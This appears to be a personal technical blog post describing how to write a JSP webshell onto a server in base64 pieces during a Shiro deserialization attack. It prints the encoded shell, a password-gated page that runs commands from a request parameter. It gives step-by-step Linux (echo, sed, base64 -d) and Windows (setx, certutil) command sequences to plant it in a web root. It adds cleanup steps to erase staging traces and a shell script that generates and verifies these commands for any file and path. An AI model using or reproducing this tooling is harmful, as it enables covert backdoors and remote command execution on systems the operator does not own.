Preface
A working stiff occasionally slacks off to read technical articles. Today I clicked on one documenting how a webshell was written in pieces during a Shiro deserialization exploit, so I'm recording it here for future Ctrl+C and Ctrl+V, because I often run into situations where a webshell has to be written by hand.
Writing a webshell on Linux
1. Prepare the shell. The one encoded below is a minimal JSP command-execution page: it checks that the pwd parameter equals admin, runs the cmd parameter through Runtime.getRuntime().exec(), and prints the process's stdout inside a <pre> block.
2. Base64-encode it (the encoding site http://www.hiencode.com is recommended here; base64 -w0 shell.jsp on a Linux box gives the same single-line output).
3. Split the encoded text into pieces and write each piece with a separate command, because in this scenario one command could not carry the whole payload. The first piece creates the staging file with a plain redirect (echo appends a newline, which base64 -d ignores later):
echo 'PCUKICAgIGlmKCJhZG1pbiIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkpewogICAgICAgIGphdmEuaW8uSW5wdXRTdHJlYW0gaW4gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKS' > ./shell.jsp
The second piece has to be inserted at the end of the existing line. The command from the original article gave me an error; after a search on Baidu, the following works:
sed -i 's/$/kuZ2V0SW5wdXRTdHJlYW0oKTsKICAgICAgICBpbnQgYSA9IC0xOwogICAgICAgIGJ5dGVbXSBiID0gbmV3IGJ5dGVbMjA0OF07CiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOwogICAgICAgIHdoaWxlKChhPWluLnJlYWQoYikpIT0tMSl7CiAgICAgICAgICAgIG91dC5wcmludGxuKG5ldyBTdHJpbmcoYikpOwogICAgICAgIH0KICAgICAgICBvdXQucHJpbnQoIjwvcHJlPiIpOwogICAgfQolPg==/' ./shell.jsp
Because the pattern is $, sed appends the piece to the end of the line without adding a second newline, so the pieces do not have to be cut on 4-character base64 boundaries (this one starts mid-group). One caveat: base64 text can contain /, which would end an s/$/.../ expression early and make sed fail with "unknown option to s"; if a piece contains one, switch the delimiter, for example s|$|...|. The & and \ characters that are special in a sed replacement never occur in base64, so nothing else needs escaping.
4. Decode the staged base64 and write the result out as the real shell:
cat ./shell.jsp|base64 -d > ./shell2.jsp
The staging file ./shell.jsp now holds only base64 text; remove it once ./shell2.jsp is in place so it does not stay behind on the target.
Writing a webshell on Windows
1. Store each piece in a persistent environment variable with setx. setx writes the value to the registry under HKCU\Environment, so the pieces survive across processes until they are deleted; it also truncates any value longer than 1024 characters, so keep each piece below that.
setx chunk_1 PCUKICAgIGlmKCJhZG1pbiIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkpewogICAgICAgIGphdmEuaW8uSW5wdXRTdHJlYW0gaW4gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKS
setx chunk_2 kuZ2V0SW5wdXRTdHJlYW0oKTsKICAgICAgICBpbnQgYSA9IC0xOwogICAgICAgIGJ5dGVbXSBiID0gbmV3IGJ5dGVbMjA0OF07CiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOwogICAgICAgIHdoaWxlKChhPWluLnJlYWQoYikpIT0tMSl7CiAgICAgICAgICAgIG91dC5wcmludGxuKG5ldyBTdHJpbmcoYikpOwogICAgICAgIH0KICAgICAgICBvdXQucHJpbnQoIjwvcHJlPiIpOwogICAgfQolPg==
2. After the variables (however many pieces there are) have been set, concatenate them into a file. When testing on your own machine, open a new cmd window first: setx does not change the environment of the process that ran it, only what processes started afterwards read.
echo %chunk_1%%chunk_2% > ./text
Note that cmd's echo writes everything up to the >, including the space in front of it, so this file ends with a trailing blank; write %chunk_2%> ./text if you want the file to contain only the base64 text.
3. Decode the file into the web directory:
certutil -decode ./text D:\git\phpStudy\PHPTutorial\WWW\shell.jsp
Afterwards delete the staging file and the variables (reg delete HKCU\Environment /v chunk_1 /f, and likewise for chunk_2), since setx left them in the registry.
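Both procedures above are the same idea, staging base64 in pieces, reassembling it and decoding, with different tools, and the error-prone part is cutting the base64 and typing the per-piece commands. The script below is an added example, not code from this post or from the referenced article: it encodes a local file, splits the base64 at a chosen length, and prints the command sequence for either target in the form the post uses, with the sed delimiter and echo spacing points handled and a cleanup step for the Windows variables. It also replays the Linux sequence locally and checks that the decoded file matches the original. Assumed: GNU sed (for sed -i) on the Linux target, setx, certutil and reg on the Windows target, and a constructed placeholder file in place of a real shell; the staging and destination paths and the chunk length are arguments chosen by the operator.

```shell
#!/bin/sh
# Added example (not from the original post): generate the per-request commands
# for a chunked base64 webshell write on Linux or Windows, and verify the Linux
# sequence locally. Assumptions: GNU sed (sed -i) on the Linux target, setx /
# certutil / reg on the Windows target, and the placeholder file produced by
# make_sample in place of a real shell. Paths and chunk length are arguments.

# Constructed placeholder standing in for the JSP shell. The "abc?" is placed so
# that the "?" sits at byte offset 8: bytes 6..8 ("bc?") base64-encode to "YmM/",
# which puts a "/" in the output, the character that breaks an s/$/.../ expression.
make_sample() { # $1 = path to write
    printf '<%%-- abc? --%%>\n<%%= "chunked write test" %%>\n' > "$1"
}

# Base64 of a file on one line, no wrapping.
b64_oneline() { # $1 = file
    base64 "$1" | tr -d '\n'
}

# Cut a single-line base64 string into pieces of $2 characters, one per line.
# The cut does not need to fall on a 4-character group boundary, because the
# pieces are reassembled before decoding.
split_chunks() { # $1 = base64 string, $2 = chunk length
    printf '%s\n' "$1" | fold -w "$2"
}

# Linux sequence: echo the first piece into the staging file (echo adds a
# newline, which base64 -d ignores), append every later piece to the end of
# that line with sed, then decode into the final path. The sed delimiter is
# "|" because base64 can contain "/"; "&" and "\" never occur in base64, so
# the replacement needs no escaping.
gen_linux() { # $1 = local file, $2 = chunk length, $3 = staging path, $4 = final path
    first=1
    while IFS= read -r piece; do
        if [ "$first" -eq 1 ]; then
            printf "echo '%s' > %s\n" "$piece" "$3"
            first=0
        else
            printf "sed -i 's|\$|%s|' %s\n" "$piece" "$3"
        fi
    done <<EOF
$(split_chunks "$(b64_oneline "$1")" "$2")
EOF
    printf 'base64 -d %s > %s\n' "$3" "$4"
}

# Windows sequence: store each piece with setx (persistent, in HKCU\Environment;
# values over 1024 characters are truncated, so the chunk length must stay
# below that), concatenate the variables into the staging file with no space
# before ">" so no trailing blank is written, decode with certutil, then delete
# the variables from the registry. A process only sees the values if its
# environment was built after setx ran; the post notes that a new cmd window
# is needed when testing locally.
gen_windows() { # $1 = local file, $2 = chunk length, $3 = staging path, $4 = final path
    n=0
    names=""
    while IFS= read -r piece; do
        n=$((n + 1))
        printf 'setx chunk_%d %s\n' "$n" "$piece"
        names="${names}%chunk_${n}%"
    done <<EOF
$(split_chunks "$(b64_oneline "$1")" "$2")
EOF
    printf 'echo %s> %s\n' "$names" "$3"
    printf 'certutil -decode %s %s\n' "$3" "$4"
    i=1
    while [ "$i" -le "$n" ]; do
        printf 'reg delete HKCU\\Environment /v chunk_%d /f\n' "$i"
        i=$((i + 1))
    done
}

# Replay the generated Linux commands in a scratch directory and report whether
# the decoded file is byte-for-byte identical to the original (exit 0 = yes).
roundtrip_linux() { # $1 = local file, $2 = chunk length
    dir=$(mktemp -d) || return 1
    gen_linux "$1" "$2" "$dir/stage.b64" "$dir/out.jsp" > "$dir/cmds.sh"
    if sh "$dir/cmds.sh" && cmp -s "$1" "$dir/out.jsp"; then rc=0; else rc=1; fi
    rm -rf "$dir"
    return "$rc"
}
```

Source the file and call, for example, gen_linux shell.jsp 400 ./s.b64 /path/to/webapps/ROOT/x.jsp or gen_windows shell.jsp 400 C:\t.txt C:\webroot\x.jsp (the paths and the length are yours to pick); each printed line is one command to send, in order. The placeholder sample deliberately carries a ? at a byte offset that base64-encodes to /, so the generated sed lines would fail if they still used / as the delimiter, and roundtrip_linux proves that the | form reassembles the file exactly even when the cuts do not line up with 4-character groups.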
References
Analysis of a Shiro deserialization case where the shell could not be written: http://mp.weixin.qq.com/s?__biz=MzkzMDMwNzk2Ng==&mid=2247495176&idx=1&sn=268c6bf534ed3cc610ccb5df6d5bec73&chksm=c27ee419f5096d0f6720921d2f6d2183574c81cad0cc06c95dfa82f842f41099733e99705070&scene=132#wechat_redirect